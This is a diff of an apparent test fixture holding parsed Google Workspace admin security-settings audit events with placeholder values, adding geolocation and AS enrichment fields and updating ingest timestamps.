@@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079532100Z", + "ingested": "2021-12-14T14:44:50.020594746Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ALLOW_STRONG_AUTHENTICATION", @@ -101,6 +113,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -110,7 +134,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079537900Z", + "ingested": "2021-12-14T14:44:50.020597563Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ALLOW_SERVICE_FOR_OAUTH2_ACCESS", 
@@ -168,6 +192,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -177,7 +213,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079543500Z", + "ingested": "2021-12-14T14:44:50.020597999Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "DISALLOW_SERVICE_FOR_OAUTH2_ACCESS", @@ -233,6 +269,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -242,7 +290,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079548Z", + "ingested": "2021-12-14T14:44:50.020598437Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID", @@ -298,6 +346,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -307,7 +367,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079553600Z", + "ingested": "2021-12-14T14:44:50.020598773Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ADD_TO_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", "provider": "admin", "action": "ADD_TO_TRUSTED_OAUTH2_APPS", 
@@ -362,6 +422,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -371,7 +443,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079558700Z", + "ingested": "2021-12-14T14:44:50.020599110Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"REMOVE_FROM_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", "provider": "admin", "action": "REMOVE_FROM_TRUSTED_OAUTH2_APPS", @@ -428,6 +500,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -437,7 +521,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079563900Z", + "ingested": "2021-12-14T14:44:50.020599448Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"BLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "BLOCK_ON_DEVICE_ACCESS", @@ -492,6 +576,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -501,7 +597,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079570300Z", + "ingested": "2021-12-14T14:44:50.020599779Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION", 
@@ -557,6 +653,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -566,7 +674,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079576700Z", + "ingested": "2021-12-14T14:44:50.020600112Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_FREQUENCY", @@ -622,6 +730,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -631,7 +751,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079583Z", + "ingested": "2021-12-14T14:44:50.020600475Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION", @@ -687,6 +807,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -696,7 +828,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079589500Z", + "ingested": "2021-12-14T14:44:50.020600806Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_START_DATE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_START_DATE", 
@@ -752,6 +884,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -761,7 +905,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079596200Z", + "ingested": "2021-12-14T14:44:50.020601315Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"ALLOWED_TWO_STEP_VERIFICATION_METHOD\",\"value\":\"ONLY_SECURITY_KEY\"}]}}", "provider": "admin", "action": "CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS", @@ -815,6 +959,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -824,7 +980,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079602500Z", + "ingested": "2021-12-14T14:44:50.020601656Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TOGGLE_CAA_ENABLEMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_CAA_ENABLEMENT", @@ -877,6 +1033,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -886,7 +1054,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079608800Z", + "ingested": "2021-12-14T14:44:50.020601987Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_ERROR_MESSAGE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_CAA_ERROR_MESSAGE", @@ -941,6 +1109,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -950,7 +1130,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079615100Z", + "ingested": "2021-12-14T14:44:50.020602322Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_APP_ASSIGNMENTS\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CAA_ASSIGNMENTS_NEW\",\"value\":\"new\"},{\"name\":\"CAA_ASSIGNMENTS_OLD\",\"value\":\"old\"},{\"name\":\"GROUP_NAME\",\"value\":\"group\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_CAA_APP_ASSIGNMENTS", @@ -1005,6 +1185,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1014,7 +1206,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079621300Z", + "ingested": "2021-12-14T14:44:50.020602677Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UNTRUST_DOMAIN_OWNED_OAUTH2_APPS", 
@@ -1069,6 +1261,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1078,7 +1282,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079627800Z", + "ingested": "2021-12-14T14:44:50.020603134Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "TRUST_DOMAIN_OWNED_OAUTH2_APPS", @@ -1100,18 +1304,6 @@ ] }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -1144,8 +1336,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:53.079634100Z", + "ingested": "2021-12-14T14:44:50.020603483Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY", @@ -1169,6 +1382,9 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" @@ -1208,6 +1424,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1217,7 +1445,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079640400Z", + "ingested": "2021-12-14T14:44:50.020603817Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENFORCE_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "ENFORCE_STRONG_AUTHENTICATION", @@ -1271,6 +1499,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1280,7 +1520,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079646700Z", + "ingested": "2021-12-14T14:44:50.020604148Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS", 
@@ -1303,18 +1543,6 @@ ] }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -1347,8 +1575,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:53.079652900Z", + "ingested": "2021-12-14T14:44:50.020604479Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED", @@ -1372,6 +1621,9 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" @@ -1411,6 +1663,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1420,7 +1684,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079659200Z", + "ingested": "2021-12-14T14:44:50.020604813Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"SESSION_CONTROL_SETTINGS_CHANGE\",\"parameters\":[{\"name\":\"REAUTH_APPLICATION\",\"value\":\"ADMIN_CONSOLE\"},{\"name\":\"REAUTH_SETTING_NEW\",\"value\":\"INHERIT\"},{\"name\":\"REAUTH_SETTING_OLD\",\"value\":\"NEVER\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "SESSION_CONTROL_SETTINGS_CHANGE", @@ -1474,6 +1738,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1483,7 +1759,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:53.079665Z", + "ingested": "2021-12-14T14:44:50.020605138Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_SESSION_LENGTH\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_SESSION_LENGTH", 
